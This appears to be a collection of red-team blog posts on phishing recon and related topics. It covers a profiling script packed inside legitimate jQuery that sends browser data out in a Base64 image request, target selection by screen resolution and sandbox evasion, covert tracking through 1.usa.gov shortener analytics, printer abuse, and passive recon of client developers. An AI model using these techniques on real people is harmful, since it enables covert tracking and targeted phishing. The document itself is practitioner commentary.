DerbyCon briefing 2018

Hi All,
I didn’t get as much time as I needed, so here is the briefing with a few additional slides added.
DerbyCon2018_Sayen_brief_variant

Video of briefing:
https://www.irongeek.com/i.php?page=videos/derbycon8/stable-00-red-teaming-gaps-and-musings-samuel-sayen

It was interesting to see several other briefings that were about the same exact underlying point, but coming up with different creative solutions.

“Gryffindor | Pure Javascript, Covert Exploitation” by Matthew Toussain of BlackHills Security, and “FoxTrot C2: A Journey of Payload Delivery” by Dimitry Snezhkov were both tool reveal talks, but focused on the same underlying points as my talk.

1. Real world attackers have more resources than Red Teams
3. Detecting a Red Team may give a client the wrong impression that they are resilient to targeting by an APT

Both of their talks addressed this fact by releasing new and novel tools. In this case endpoint agents (Gryffindor), and C2 (FoxTrot C2). My idea was just to skip the details of endpoint compromise and phishing, whitelist the payload, and by doing so bring yourself into parity with an APT. You are inside the network, you have persistence, let the real test begin. So I guess you could say my idea was born out of pragmatism and the notion that although staying even with APT’s may be possible for periods at a time it is not sustainable for the red teaming community over the long haul.

This is just a call to use stealthy Internal Penetration Testing where the SOC is being tested. This is not a new idea, or something I made up. This is simply a new way to frame and think of an already existing style of engagement. If we agree with the “Assume Breach” mentality we should consider a stealthy internal test as the closest thing to real world threat emulation. Unless you are a red team with a golden ticket to break the law. If that’s the case, let me know if you are hiring. Let me know what your thoughts are.

Sam (keyzer a.T. protonmail.ch).

Thoughts on user profiling

Boy oh boy has it been awhile. New job, new state, new house, new excuses 🙂

I wanted to make a post on the subject of user profiling as a way to document and work out my own thoughts on the subject. Sometimes things that sound great in your head look utterly stupid once you put them to “ink”. This is also a good time to talk about a script that I pushed to Github:

https://github.com/keyzerrezyek/JQueryingU

This script has some background info on the Github page, including info on the original author of the script. I took his work, added the Flash support, minimized, and packed the script, then put it inside legitimate jQuery. The profiling exfill method was modified to be inside a Base64 image GET request rather than a POST.

This post is looking to discuss the value of profiling users and if there are other benefits that have been overlooked.

Profiling activity through websites can be broken down into two catgegories:

  • Passive – no profiling script. Attacker is just looking at UserAgent in GET requests on attacker controlled domain
  • Active – profiling script and/or cookies are used. Attacker monitors POST or encoded GET request output from the profiling script

The obvious benefit to Passive is that there is no “script” for the victims SOC to find in the event that an email gets flagged as suspicious. The downside is that there are limitations to the info you can get from a UserAgent; information such as support for Flash and Java will not be present. The benefits to active are the exact inverse of passive. That being said, plenty of legitimate “profiling” scripts are being used by non-malicious websites to make sure proper content is being delivered. The rewards far outweigh the risks in my opinion. I might make an exception if the target is a known “hard target” or person of importance that will have email under a higher degree of scrutiny.

Focusing on the active side of things, what do we want to get out of profiling?

The obvious answer is, “the users plugins and versions so we can create a targeted exploit if applicable.” While that is still true, I believe that this is largely becoming less relevant as Flash phases out slowly. Corporations often times need to run Java, but sending an “exploit” to the endpoint is fairly risky when you don’t know what EDR products are on the workstation. Criminals have no problems doing this back in the day with exploit kits because it’s a number game and they aren’t trying to target one specific corporation like a Red Teamer is.

A more nuanced benefit is that you can get an idea which users are likely to click on links, and then follow up down the road with an actual payload for the specific users that are known “clickers”. No point in spraying your malicious link across an organizations inboxes if you don’t have to. APT’s are well known for performing recon before delivering payloads, but many Red Teams do not since they are on a tight timeframe. I have no scientific data to back it up, but the inclusion of screen resolution is my favorite piece of data returned. Why? Most sandboxes have very low resolutions, and I don’t believe I have ever seen more modern resolutions like 1920x. Additionally, if you get some crazy high resolution like 3840 I would stereotypically say that user might be a higher priority target like a developer or sys admin. I would also caution that those are the users more likely to report phishing or poke at your infrastructure. My ideal target is running IE and 1600 ish resolution. No technical users surf the web with IE if they have any other options, and not too many orgs don’t have Chrome/Chromium or Firefox alongside the corporate mandated IE for some crappy legacy app that absolutely must be supported. So anyone with IE and a lower resolution is often times our standard, non technical office grunt. That being said, sometimes if people are clicking on links inside Outlook it will open in IE as a default browser.

An additional benefit is that you can embed a profiling script on a web page which contains a payload and then send each targeted user a link to a unique URI. For example, send users a link to http://example.com/clickme.php?companyname=unique_id where each unique_id is correlated to a particular targeted user. The profiling script which I have put on github is designed to be used in this method. You would be amazed at how much traffic your site starts getting as soon as you start phishing. Being able to determine what the “leak” is and if requests outside your targeted user are general spidering behavior, or threat hunters performing targeted “poking” are useful to gauge the overall security posture of your target. On engagements before I have heard a Tier2 SOC analyst proudly say, “Did you see my request to your site, I used the Google Bot User Agent?” Of course a seasoned SOC will not typically touch any suspected attack infrastructure. But….. this is the real world and it happens.

The profiling script which is 90% the code created by Christian Ludwig and cited on my github is pretty standard. It give you the following info.

http://localhost:8000/index.php?id=sam|OS: Mac OS X 10.13|Browser: Firefox 60 (60.0)|Mobile: false|Flash: 29.0 r0|Java: false|Cookies: true|Screen Size: 1680 x 1050|Language: en-US|Full User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0

The original request inside your access log will look as follows:

Example Log output: [Mon Apr 16 11:51:17 2018] ::1:63582 [200]: /analytics.gif?uid=aHR0cDovL2xvY2FsaG9zdDo4MDAwL2luZGV4LnBocD9pZD1zYW18T1M6IE1hYyBPUyBYIDEwLjEzfEJyb3dzZXI6IEZpcmVmb3ggNjAgKDYwLjApfE1vYmlsZTogZmFsc2V8Rmxhc2g6IDI5LjAgcjB8SmF2YTogZmFsc2V8Q29va2llczogdHJ1ZXxTY3JlZW4gU2l6ZTogMTY4MCB4IDEwNTB8TGFuZ3VhZ2U6IGVuLVVTfEZ1bGwgVXNlciBBZ2VudDogTW96aWxsYS81LjAgKE1hY2ludG9zaDsgSW50ZWwgTWFjIE9TIFggMTAuMTM7IHJ2OjYwLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjAuMA==

Happy Profiling.

Thoughts on Krebs article about .gov URL shortener abuse

——————Update: 19 Apr 2016

Nearly a month later the same spam campaign is still attempting to use the virginia government website to refer spam victims to their strikenx.bid and assembled.accountant domains.. Either people are reading spammy emails a month late, or the idiots in charge of the campaign haven’t changed their spam campaign despite it not properly using the referral.

Of note, some other pushers seem to be trying to exploit the referral mechanism of an EPA website, but failing as well..
new_spam_campaign

new_spam_campaign2

One other thing that I was thinking about with regards to reconnaissance is the Witchcoven campaign that fire eye reported on. https://www2.fireeye.com/rs/848-DID-242/images/rpt-witchcoven.pdf

Although the profiling that you can do with the method I detailed below is much more limited than what the Witchcoven actors are using, there is one distinct advantage with my method. There is no infrastructure or indicators to uncover since you don’t need to compromise a legit server or even buy your own profiling servers. With no easy way to link the reconnaissance to the next step which would be delivering the targeted recipients an exploit based on their android kernel and browser it would be significantly harder to figure out if victims are random targets of opportunity or chosen…

——————–end update

——————Update: 31 March 2016

I found another “fun” use for the data coming off the developer stream for the bit.ly gov shortener 1usagov.

Everybody talks about how bad the Android ecosystem is for updates, and that the majority of phones in the field are vulnerable to something or other. It is nice to see the data myself though. By curl’ing the developer stream and then grep’ing for Android versions it’s pretty apparent. I’m not even going to bother making iOS comparisons cause that has been done to death. Needless to say the world is ripe for the droid malware ecosystem or worse.

android

curl --url http://developer.usa.gov/1usagov | grep -o 'Android [0-9].[0-9].[0-9]'

android2

XP is dead, long live XP!
——————–end update

xp
Brian Krebs reported on this issue last week and I did some poking today so I thought I would write a small article.

http://krebsonsecurity.com/2016/03/spammers-abusing-trust-in-us-gov-domains/

As reported by Krebs, bit.ly offers a URL shortener to government addresses such as .gov, .mil, etc. The main security issue as reported by Krebs is that if a spammer or malware pusher can find any sort of local or state government site that offers shortening services to any site, they can then in turn use the bit.ly service to shorten it into a more legitimate looking 1.USA.gov address.

On my linux box I ran the following command to find an active spam operation.

curl --url http://developer.usa.gov/1usagov | grep "VAURL

The results were a Russian spam operation attempting to abuse a va.gov domain, but failing at it since the virginia website was not correctly directing to their URL’s.
spam_campaign

Domains associated with this particular Russian IP, and the spam campaign.
spam_campaign3

The more interesting thing for me isn’t the shortening tactic, but the USA.gov developer view that Krebs reported.

http://developer.usa.gov/1usagov
developer

If IP’s were included this would be pretty close to the ideal control panel that you would want for running a malware/spam campaign.

What is interesting about this to me?

I can use a LEGITIMATE and unique url for a government website, send it to someone after doing the bit.ly shortening which gives it the http://1.usa.gov/…. and then know all the information about their browser, and their timezone. Normally I would have to use BEEF, cookies, etc.. Now I can do it without using cookies, or owning any public domains/IP’s.

My idea in practice.

Find a random unique gov address:

http://www.fsis.usda.gov/wps/portal/fsis/topics/food-safety-education/get-answers/food-safety-fact-sheets/meat-preparation/ground-beef-and-food-safety/ct_index

Shorten it through bit.ly
http://1.usa.gov/1drrCH6

Curl the developer API website for the unique URL:

curl --url http://developer.usa.gov/1usagov | grep "http://www.fsis.usda.gov/wps/portal/fsis/topics/food-safety-education/get-answers/food-safety-fact-sheets/meat-preparation/ground-beef-and-food-safety/ct_index"

And sure enough………. I get a hit on my OS, browser, language, and timezone which could be useful info to then target further messages for a spam campaign or malware. Since this is a unique address I sent to one person I know there won’t be a false positive. Well, at least there wasn’t going to be until I posted it in this blog.. 😉

Capture_me

TAAS – Tracking As A Service. Is that a thing?

HP JetDirect in the news… when it isn’t actually news

Last week my twitter feed had a posting noting an article which got coverage about thousands of HP printers allowing anonymous ftp access via the JetDirect protocol.Screen Shot 2016-02-07 at 14.55.37

This was a bit surprising. Not cause of the vulnerability, but because it was making the news since it was actually really old information. The vulnerability in the JetDirect protocol (port 9100) used by HP Printers has been known for years. I first learned about it in 2012 from a team member on a Red Cell, no idea how long he had known about it. Here is an article explaining it in 2013. https://www.nowsecure.com/blog/2013/01/14/exploiting-printers-via-jetdirect-vulnerabilities/

Not ragging on the guy that reported it, but all of his headline making security news articles have been nothing more than searching Shodan results for already known issues.

The vulnerability is semi useful on internal networks for hosting malicious files (sometimes code coming from an internal IP is trusted or evades CIRT scrutiny). In theory this makes them the ideal place for miscreants to host malware since http(s) traffic is the best way to blend in with normal traffic and avoid firewall rules.

What this article failed to acknowledge is that 95 out of 100 times uploading a very small file to the HP through JetDirect will crash the service and the server from my testing. In my opinion the threat that these unsecured printers pose on the internet is minimal at best with regards to this. The miscreants that push malware can buy cheap server space using stolen credit cards or anonymous payment methods. Additionally, real web servers that can handle traffic can be infected via WordPress vulnerabilities and misconfigurations nearly as easily as these HP printers with the aid of Shodan.io for targeting. The last thing a criminal wants is for the spear phishing to be successful but the infections to fail due to crappy hosting for the malware.

A more accurate assessment of this threat would be to comb the Shodan results for “Port:9100” looking for malicious files hosted on these HP printers. I am guessing the number would be nearly non-existent and not cause the malware pushers don’t know about the opportunity. Cause it isn’t worth their time.

IMHO a more worthy use of multi function devices for malicious purposes would be trying to configure any digital sender functionality to go through your personal SMTP gateway so that you can take copies of internal documents. If they are using LDAP for authentication that also opens up the possibility of stealing credentials if you can pipe the queries through the attacker box.

Screen Shot 2016-02-07 at 16.56.38

Another printer bites the dust after uploading a file…

Thoughts on expanding your scope

I know I have been fairly inactive on here lately, so I figured I would start the new year off on the right foot by posting an article even if it is rather non technical.

Clients looking to have an assessment of their IT infrastructure and personnel via a penetration test always have to spell out what is in scope so nobody gets into legal issues or crashes production systems. Unfortunately when you are the good guy you have pesky things to worry about that Sergey in his Adidas tracksuit never has to think about. “What if my banking RAT spreads onto the HR systems and accidentally steals PII?” – said no attacker ever. In the long run clients usually want a test to be as real world as possible, but they certainly don’t want to have downtime or lose money. It is a reasonable accommodation because as Wu-Tang elegantly puts it Cash Rules Everything Around Me (CREAM).

Things can get a bit more ambiguous with scope if you are using enterprise services from third parties (Google EC2, Dropbox Enterprise, etc) but most of them do have fine print and proper forms which can be filled out which would allow the penetration test to include your assets hosted on their servers. Let’s face it, the day and age of a static IP range of company owned hardware is behind us for the most part. On top of this modern organizations have a complex and sometimes undocumented attack surface which includes servers and services co-located, leased, virtualized, and on-demand which can encompass multiple countries with their varying cyber laws.

What a client tells you is their IT assets rarely lines up with all the potential ways they can be digitally compromised.

On a recent assessment I came across some vulnerabilities unknowingly (to the client) created by the company they contracted to create the website and mobile app. This got me thinking about how rarely anyone includes third party developers in the scope of a penetration test even though they often times still maintain and keep clones or testing versions of your target.

You come in as a pen tester to look at the finished or nearly complete website/app that is provided to you by the client. That’s great and all, but don’t forget that at some point there was likely dozens of versions created and tested back at the web/app developers network. Unless you make an effort to uncover where those assets are you might be missing out on an expanded attack surface in your assessment.

What I am not saying is that without clearly defined guidelines can you can compromise an outside developers network in order to gain access to your client. What I am saying is that at a minimum you should be looking at them for data which can be leveraged in a pen test. If your client paid to have a website created, and a clone of it is sitting on a separate subdomain you should attempt to have that included in the scope. If that is not doable, then there is plenty that you can do as a sort of pentest light which keeps you legally cleared. Below are the very well known tools that can be done passively (ish) and still give you good results. Notice I am not mentioning using burp for sql injection or anything agressive.

Passive Recon of Developer Networks:

Robtex.com (the old site is still more functional) – look to see what lives in the IP range of your client AND the company that made the website/app. Look at the reverse lookups to determine if the company had something live dev.yourclient.webcompany.com. This can also be a place to find developer companies with duplicates of your clients SSL certificates…..

shodan.io – Not even sure I have to say this. What can not be overstated is that if there is a glaring vulnerability documented by shodan that you are certainly not the first to find this. In addition to the dangers of leaking data, database structures of the testing db (can help with sql injection on the production network), don’t underestimate the dangers of giving access to a test database. How is the testing/dev backend being brought online for production? As is the case currently, thousands of MongoDB’s have anonymous read/write access. What’s to stop me from putting in an account on the testing database if I know it is going to be replicated over once it goes into production?

Case in point, here is a common sight if you do db searches.Screen Shot 2016-01-02 at 17.38.16

Google.com – Don’t laugh. Use special searches to look for juicy info that might be unlinked, or intended to be internal. I have found dozens of sensitive documents, PII spills, and change request docs using this method. Example: inurl:dev.company.gov Internal Use Only Google has a knack for indexing documents which companies forget about because they are not linked to websites anymore. Even if it is gone now you might be able to get the text of the document cached if you are lucky. On a recent assessment I found the developers decided to put all their internal Change docs off of an indexed directory for some odd reason. In one of those documents they duly noted that they Backdoored the website with the account “Developer:1234”. To think i was wasting time reversing an Android apk file to look for credentials….

Webburp spider – The staple in every webapp testing toolset. Let the spider run on the domain of your client, AND the developer’s website. Developers have a way of leaving behind testing url’s or directories inside comments in javascript files for some reason.

Maybe more to come… Have fun.